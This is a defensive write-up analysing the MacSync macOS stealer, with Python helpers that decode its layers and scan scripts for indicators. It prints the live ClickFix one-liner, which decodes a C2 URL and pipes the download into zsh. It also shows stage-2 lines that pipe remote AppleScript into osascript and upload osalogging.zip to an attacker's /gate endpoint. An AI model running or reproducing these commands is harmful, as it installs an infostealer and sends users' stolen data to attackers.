Malware Analysis — Write-Up

MacSync Stealer: Static Malware Analysis

Author: Kelvin Creighton
#malware #macos #zsh #static-analysis #applescript

01 Initial Discovery

In December 2025, a friend encountered a suspicious 'ClickFix' campaign. Intrigued, I decided to take a look. The lure was simple: a popup urging users to download an application by running a 'simple' command in their Terminal. To build trust, the campaign even included an embedded video of someone supposedly running the command on a VM. The command provided was an obfuscated one-liner designed to bypass mental filters by appearing 'technical' and 'complicated':

STEP 01: The Malicious One-Liner
INPUT: curl -kfsSL $(echo 'aHR0cDovL2ZvbGRleG1vb24ud29ybGQvY3VybC9lYzdlNzRkM2E1MDY1NzZmZmFmNTAyMDg3Yjk1YzIzYzEzMWExYWRmMmU1ZDAwYjkwN2UwZDc3ZDIyYjQzN2Ey'|base64 -D)|zsh
OUTPUT: [Executes Stage 1 Loader]

Reason: The command decodes a Base64 string to reveal the hidden C2 URL (http://foldexmoon.world/curl/...), downloads the payload silently using curl (-fsSL suppresses output and follows redirects; -k additionally disables TLS certificate checking), and immediately pipes it into zsh for execution. Nothing is written to disk by the one-liner itself. Obfuscating the URL prevents users from easily checking it in a browser, where security filters might trigger a warning.

STEP 02: C2 Header Analysis
INPUT: curl -I --max-time 5 http://foldexmoon.world/curl/ec7e74d3a506576ffaf502087b95c23c131a1adf2e5d00b907e0d77d22b437a2
OUTPUT:
  HTTP/1.1 200 OK
  Content-Type: application/octet-stream
  Content-Length: 834
  Server: cloudflare
  Content-Disposition: attachment; filename="ec7e74d3a506576ffaf502087b95c23c131a1adf2e5d00b907e0d77d22b437a2.daily"

Reason: The server delivers the 834-byte file as a generic application/octet-stream with a .daily extension, fronted by Cloudflare. Hiding a script behind a generic content type, a Cloudflare front and a non-standard extension is a common obfuscation tactic for Malware-as-a-Service (MaaS) distribution.

02 Stage 1: The Zsh Loader

The downloaded file revealed itself to be a Zsh script. Its sole purpose is to decode and execute a second-stage payload entirely in memory, a technique known as 'fileless' execution, which helps evade traditional antivirus scans that look for malicious files on disk.

STEP 01: Deobfuscating the Stager
INPUT: cat ec7e74d3a506576ffaf502087b95c23c131a1adf2e5d00b907e0d77d22b437a2.daily
OUTPUT:
  #!/bin/zsh
  d25941=$(base64 -D <<'PAYLOAD_m14659633818266' | gunzip
  H4sIAFAeM2kAA+VU0W7TMBR971dcsmrqJJI4cROvHWWbJsHQmIa0ISYBqhz7urXq2FHism7AvxO6...
  PAYLOAD_m14659633818266
  )
  eval "$d25941"

Reason: The script feeds a quoted here-document through base64 -D (the macOS spelling of the decode flag; GNU coreutils uses -d, so the stager will not run unmodified on Linux, and an analyst decoding it there must switch the flag) and gunzip to unpack the hidden payload. The eval command then executes the result immediately, so the second stage never touches disk.

STEP 02: Extracting Stage 2
INPUT: echo "[BASE64_DATA]" | base64 -D | gunzip > stage2.sh
OUTPUT: [A 1.3KB Zsh Script]

Reason: By manually decoding the payload, we reveal the core logic of the MacSync Stealer before it can execute and hide itself.
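Both obfuscation layers seen so far (the base64 substitution in the ClickFix one-liner and the base64-plus-gzip here-document in the Stage 1 stager) can be unwrapped statically, without ever handing anything to zsh or eval. The following script is an added example written for this write-up, not tooling from the original analysis; the regular expressions, function names and the constructed sample stager are assumptions of the example. The only page data it uses is the one-liner quoted above.

```python
"""Static unwrapping of the ClickFix one-liner and the Stage 1 stager.

Added example (not the write-up author's tooling). Decodes the
$(echo '<b64>' | base64 -D) substitution and the base64 | gunzip
here-document pattern without executing anything.
"""
import base64
import gzip
import re

# The one-liner quoted in the write-up (copied from the page).
ONE_LINER = (
    "curl -kfsSL $(echo 'aHR0cDovL2ZvbGRleG1vb24ud29ybGQvY3VybC9lYzdlNzRkM2E1MDY1NzZmZmFmNTAyMDg3Yjk1YzIzYzEzMWExYWRmMmU1ZDAwYjkwN2UwZDc3ZDIyYjQzN2Ey'|base64 -D)|zsh"
)

# $(echo '<b64>' | base64 -D), also accepting the GNU -d / --decode spellings.
_ECHO_B64 = re.compile(
    r"\$\(\s*echo\s+['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\|\s*base64\s+(?:-D|-d|--decode)\s*\)"
)


def unwrap_echo_base64(command: str) -> tuple[str, list[str]]:
    """Replace every $(echo '<b64>' | base64 -D) with its decoded text.

    Returns the rewritten command and the decoded strings, so the hidden
    URL can be inspected (or looked up) without running the command.
    """
    decoded: list[str] = []

    def _sub(m: re.Match) -> str:
        text = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        decoded.append(text)
        return text

    return _ECHO_B64.sub(_sub, command), decoded


def pipes_into_interpreter(command: str) -> bool:
    """True when the command pipes fetched content straight into a shell or osascript."""
    return re.search(r"\|\s*(?:zsh|bash|sh|osascript)\b", command) is not None


# Stage 1 shape:  VAR=$(base64 -D <<'MARKER' | gunzip  <base64 lines>  MARKER )  eval "$VAR"
_HEREDOC = re.compile(
    r"base64\s+(?:-D|-d|--decode)\s*<<-?\s*'?(?P<marker>\w+)'?\s*\|\s*gunzip\s*\n"
    r"(?P<body>.*?)\n(?P=marker)\s*$",
    re.DOTALL | re.MULTILINE,
)


def unpack_heredoc_stager(script: str) -> str:
    """Recover the text that the stager would eval, without running it."""
    m = _HEREDOC.search(script)
    if m is None:
        raise ValueError("no base64 | gunzip here-document found")
    raw = base64.b64decode("".join(m.group("body").split()), validate=True)
    return gzip.decompress(raw).decode("utf-8", "replace")


def build_sample_stager(inner: str, marker: str = "PAYLOAD_m14659633818266") -> str:
    """Constructed stand-in for the .daily file: wraps `inner` the way Stage 1 does.

    The page only shows a truncated payload, so this builds a harmless one
    with the same structure for demonstration (assumption of the example).
    """
    blob = base64.b64encode(gzip.compress(inner.encode())).decode()
    lines = "\n".join(blob[i:i + 76] for i in range(0, len(blob), 76))
    return (
        "#!/bin/zsh\n"
        f"d25941=$(base64 -D <<'{marker}' | gunzip\n{lines}\n{marker}\n)\n"
        'eval "$d25941"\n'
    )


if __name__ == "__main__":
    cmd, urls = unwrap_echo_base64(ONE_LINER)
    print("hidden URL(s):", urls)
    print("pipes into interpreter:", pipes_into_interpreter(cmd))
    sample = build_sample_stager('echo "harmless constructed stage 2"\n')
    print("recovered stage 2:", unpack_heredoc_stager(sample), end="")
```

Running the script prints the C2 URL from STEP 01 and recovers the constructed inner script from the sample stager; point unpack_heredoc_stager at the real .daily file's text to get stage2.sh without the eval ever running.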

03 Stage 2: The Stealer Core

The second stage is a sophisticated Zsh-based stealer that acts as a background daemon. It is designed to be persistent, stealthy, and highly dynamic by fetching AppleScript payloads directly from the C2 server.

STEP 01: Stealth Mechanisms
INPUT: head -n 10 stage2.sh
OUTPUT:
  daemon_function() {
    exec </dev/null
    exec >/dev/null
    exec 2>/dev/null
    local domain="foldexmoon.world"

Reason: The script redirects stdin, stdout and stderr to /dev/null, ensuring no output is visible in the user's Terminal and no prompt can block it. It then defines its Command & Control (C2) domain.

STEP 02: Dynamic AppleScript Execution
INPUT: grep 'osascript' stage2.sh
OUTPUT: curl -k -s ... "http://$domain/dynamic?txd=$token" | osascript

Reason: This is a critical discovery. The malware downloads dynamic AppleScript code and pipes it into osascript. This allows the attacker to push new stealing logic (Keychain access, browser data harvesting, etc.) without updating the main script.

STEP 03: Data Exfiltration (The 'Gate')
INPUT: grep 'POST' stage2.sh
OUTPUT: curl -k -X POST ... -F "file=@/tmp/osalogging.zip" ... "http://$domain/gate"

Reason: The malware bundles stolen data into /tmp/osalogging.zip and uploads it to the /gate endpoint. Research confirms that osalogging.zip is a known Indicator of Compromise (IoC) for the MacSync family.
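The three Stage 2 traits above (all standard streams sent to /dev/null, remote content piped into osascript, and a multipart upload of /tmp/osalogging.zip to /gate) are exactly the kind of static indicators a defender can check any suspicious shell script for. The scanner below is an added example, not part of the original write-up: the rule names, weights and score threshold are assumptions of the example, and the sample stage-2 text is constructed from the fragments quoted on this page (the real stage2.sh is about 1.3 KB and is not reproduced here).

```python
"""Static indicator scan for the Stage 2 behaviours quoted in the write-up.

Added example (not the author's tooling). Rule weights are an assumption
of the example, chosen so that the known IoC and the osascript pipe score
highest; tune them for your own environment.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern
    weight: int


RULES = [
    # exec </dev/null ; exec >/dev/null ; exec 2>/dev/null, in that order
    Rule("all-streams-to-devnull",
         re.compile(r"exec\s*<\s*/dev/null.*?exec\s*>\s*/dev/null.*?exec\s*2>\s*/dev/null", re.S), 3),
    # remote content executed as AppleScript (STEP 02 above)
    Rule("curl-piped-to-osascript", re.compile(r"curl\b[^\n|]*\|\s*osascript\b"), 4),
    # remote content executed by a shell (the ClickFix one-liner shape)
    Rule("curl-piped-to-shell", re.compile(r"curl\b[^\n|]*\|\s*(?:zsh|bash|sh)\b"), 3),
    # multipart upload of an archive (STEP 03 above)
    Rule("multipart-zip-upload", re.compile(r"curl\b[^\n]*-F\s*[\"']?file=@[^\s\"']*\.zip"), 3),
    Rule("gate-endpoint", re.compile(r"https?://[^\s\"']*/gate\b"), 2),
    # file name reported as a MacSync IoC in the write-up
    Rule("osalogging-zip-ioc", re.compile(r"osalogging\.zip"), 5),
    # -k / --insecure, also when bundled with other short flags (-kfsSL)
    Rule("tls-verification-disabled",
         re.compile(r"curl\b[^\n]*\s-(?:[A-Za-z]*k[A-Za-z]*|-insecure)\b"), 1),
]

SUSPICIOUS_THRESHOLD = 5  # assumption of the example


def scan_script(text: str) -> dict:
    """Return matched rule names, the summed weight, and a verdict."""
    hits = [r.name for r in RULES if r.pattern.search(text)]
    score = sum(r.weight for r in RULES if r.name in hits)
    return {"hits": hits, "score": score, "suspicious": score >= SUSPICIOUS_THRESHOLD}


# Constructed sample assembled from the fragments quoted in the write-up.
SAMPLE_STAGE2 = '''daemon_function() {
  exec </dev/null
  exec >/dev/null
  exec 2>/dev/null
  local domain="foldexmoon.world"
  curl -k -s "http://$domain/dynamic?txd=$token" | osascript
  curl -k -X POST -F "file=@/tmp/osalogging.zip" "http://$domain/gate"
}
'''

# Constructed benign installer-style script for comparison.
BENIGN_SCRIPT = '''#!/bin/sh
curl -fsSL https://example.invalid/release.tar.gz -o release.tar.gz
tar xzf release.tar.gz
'''

# Constructed stand-in for the ClickFix one-liner shape (URL already decoded).
ONE_LINER_SHAPE = "curl -kfsSL http://example.invalid/payload|zsh"


if __name__ == "__main__":
    for label, src in (("sample stage 2", SAMPLE_STAGE2),
                       ("benign", BENIGN_SCRIPT),
                       ("one-liner shape", ONE_LINER_SHAPE)):
        print(label, scan_script(src))
```

The rules are deliberately narrow string patterns rather than full shell parsing; they are meant for a quick triage pass over scripts found in a user's history, /tmp or a LaunchAgent, and a hit on the IoC rule alone should be enough to escalate.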

04 Context & Research

After my initial analysis in December 2025, further research confirmed this was MacSync Stealer (also known as Mac.c), a Malware-as-a-Service (MaaS) created by the threat actor 'Mentalpositive'.

Evolution of MacSync

  • Origins: Emerged in April 2025 as a cheap, accessible infostealer for entry-level cybercriminals.
  • Social Engineering: Leverages the complexity of Terminal commands to bypass user suspicion. The use of base64 encoding prevents link discovery through browser-based security filters.
  • Trust Building: Employs social proof, such as embedded videos of VMs supposedly running the command safely, to manipulate users into taking high-risk actions.
  • Distribution: Evolved from 'ClickFix' Terminal commands to highly sophisticated, Apple-notarized Swift applications to bypass Gatekeeper.
  • Infrastructure: Extensive use of the .world and .shop TLDs (e.g., foldexmoon.world) for C2 operations.

05 Key Takeaways

Security Recommendations

  • Never copy and paste commands from untrusted websites into your Terminal, even if they appear to be from 'trusted' sources like GitHub or ChatGPT.
  • The use of curl | sh or curl | osascript is a high-risk pattern that should be treated with extreme suspicion.
  • Regularly audit your /tmp directory and background processes for unusual activity, particularly those redirecting all output to /dev/null.

All steps performed in a legal environment.